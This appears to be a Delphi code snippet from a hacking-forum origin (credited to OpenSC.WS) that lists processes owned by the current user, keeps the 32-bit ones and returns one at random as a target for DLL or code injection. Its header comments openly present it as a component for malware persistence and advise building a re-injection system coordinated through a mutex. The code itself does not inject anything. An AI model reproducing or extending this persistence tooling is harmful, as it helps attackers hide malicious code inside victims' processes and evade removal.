This Unit is Made by Snify and MindfreaK together. We went bored and searched for an x64 persistence method. U can easily write your own x64 persistence with this , just write ur persistence dll or codeinjection and inject it into an process u have found with GetInjectAbleProcess. WARNING: Remember, the Process is chosen randomly and could be terminated by itself , so u need an re-inject system which checks for an running persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex ) { This Unit is Made by Snify and MindfreaK together. We went bored and searched for an x64 persistence method. U can easily write your own x64 persistence with this , just write ur persistence dll or codeinjection and inject it into an process u have found with GetInjectAbleProcess. WARNING: Remember, the Process is chosen randomly and could be terminated by itself , so u need an re-inject system which checks for an running persistence module/dll/codeinjection. ( TIPP: Communicate via Mutex ) - OpenSC.WS - } unit uGetProcess; interface uses SysUtils,TlHelp32,Windows; function GetInjectAbleProcess() : Integer; implementation type PTOKEN_USER = ^TOKEN_USER; _TOKEN_USER = record User: TSidAndAttributes; end; TOKEN_USER = _TOKEN_USER; function GetUserAndDomainFromPID(ProcessId: DWORD; var User, Domain: string): Boolean; var hToken: THandle; cbBuf: Cardinal; ptiUser: PTOKEN_USER; snu: SID_NAME_USE; ProcessHandle: THandle; UserSize, DomainSize: DWORD; bSuccess: Boolean; begin Result := False; ProcessHandle := OpenProcess(PROCESS_QUERY_INFORMATION, False, ProcessId); if ProcessHandle <> 0 then begin // EnableProcessPrivilege(ProcessHandle, 'SeSecurityPrivilege', True); if OpenProcessToken(ProcessHandle, TOKEN_QUERY, hToken) then begin bSuccess := GetTokenInformation(hToken, TokenUser, nil, 0, cbBuf); ptiUser := nil; while (not bSuccess) and (GetLastError = ERROR_INSUFFICIENT_BUFFER) do begin ReallocMem(ptiUser, cbBuf); bSuccess := GetTokenInformation(hToken, TokenUser, ptiUser, cbBuf, cbBuf); end; CloseHandle(hToken); if not bSuccess then begin Exit; end; UserSize := 0; DomainSize := 0; LookupAccountSid(nil, ptiUser.User.Sid, nil, UserSize, nil, DomainSize, snu); if (UserSize <> 0) and (DomainSize <> 0) then begin SetLength(User, UserSize); SetLength(Domain, DomainSize); if LookupAccountSid(nil, ptiUser.User.Sid, PChar(User), UserSize, PChar(Domain), DomainSize, snu) then begin Result := True; User := StrPas(PChar(User)); Domain := StrPas(PChar(Domain)); end; end; if bSuccess then begin FreeMem(ptiUser); end; end; CloseHandle(ProcessHandle); end; end; function IsWOW64: Boolean; type TIsWow64Process = function(Handle: THandle;var Res: BOOL): BOOL; stdcall; var IsWow64Result: BOOL; IsWow64Process: TIsWow64Process; begin IsWow64Process := GetProcAddress( GetModuleHandle('kernel32'), 'IsWow64Process' ); if Assigned(IsWow64Process) then begin IsWow64Process(GetCurrentProcess, IsWow64Result); Result := IsWow64Result; end else Result := False; end; Function GetUserFromWindows: string; Var UserName : string; UserNameLen : Dword; Begin UserNameLen := 255; SetLength(userName, UserNameLen) ; If GetUserName(PChar(UserName), UserNameLen) Then Result := Copy(UserName,1,UserNameLen - 1) Else Result := 'Unknown'; End; function GetInjectAbleProcess() : Integer; // 32 bit only var bProcess: boolean; hProcess: THandle; pe32Structur: TProcessEntry32; sUser: string; sDomain: string; sWindowsUser: string; TIsWow64Process : function( Handle: Windows.THandle; var Res: Windows.BOOL): Windows.BOOL; stdcall; hOpen: THandle; bIsWOW64: BOOL; bError: boolean; array_PID : array of integer; pidcounter : Integer; begin pidcounter := 0; sWindowsUser := GetUserFromWindows; pe32Structur.dwSize:=Sizeof(TProcessEntry32); hProcess :=CreateToolHelp32SnapShot(TH32CS_SNAPPROCESS, 0); If IsWow64 = true then begin TIsWow64Process := GetProcAddress(GetModuleHandle('kernel32'), 'IsWow64Process'); if Assigned(TIsWow64Process) then begin // Writeln ( 'API geladen.' ) end; end; if Process32first(hProcess,pe32structur) then begin //Writeln ( IntToStr (pe32Structur.th32ProcessID) ); repeat bProcess:=Process32Next(hProcess,pe32structur); if GetCurrentProcessID <> pe32Structur.th32ProcessID then begin bError := false; if bProcess = true then begin GetUserAndDomainFromPID(pe32Structur.th32ProcessID,sUser, sDomain); if sWindowsUser = sUser then begin if IsWOW64 = true then //wenn 64 begin //Writeln ('OpenProcess: '+IntToStr(pe32Structur.th32ProcessID)); hOpen := Windows.OpenProcess ( PROCESS_QUERY_INFORMATION , false , pe32Structur.th32ProcessID ); if hOpen = 0 then begin //Writeln ('OpenProcess gescheitert.'); bError := true; end; if bError = false then begin TIsWow64Process ( hOpen , bIsWOW64 ); CloseHandle ( hOpen ); if bIsWOW64 = false then begin // Writeln ( '64Bit: '+IntToStr(pe32Structur.th32ProcessID) ) end; if bIsWOW64 = true then begin //Writeln ( {'32Bit: '+}IntToStr(pe32Structur.th32ProcessID) ); SetLength(array_PID, pidcounter+1); array_PID[pidcounter] := pe32Structur.th32ProcessID; inc(pidcounter); end; end; end; if ISWOW64 = false then //Wenn 32 begin //Writeln ( IntToStr (pe32Structur.th32ProcessID) ); SetLength(array_PID, pidcounter+1); array_PID[pidcounter] := pe32Structur.th32ProcessID; inc(pidcounter); end; end; end; end; until not bProcess; end; CloseHandle ( hProcess ); {$IFDEF Debug} for pidcounter := 0 to Length(array_PID) -1 do begin writeln ('INDEX['+inttostr(pidcounter)+'] ' + inttostr(array_PID[pidcounter])); end; {$ENDIF} randomize; result := array_PID[1 + random (Length(array_PID)-1)]; end; end. |
Delphi Basics - Free Delphi Source Code - Ultimate Programming Resource > Delphi Basics Snippets >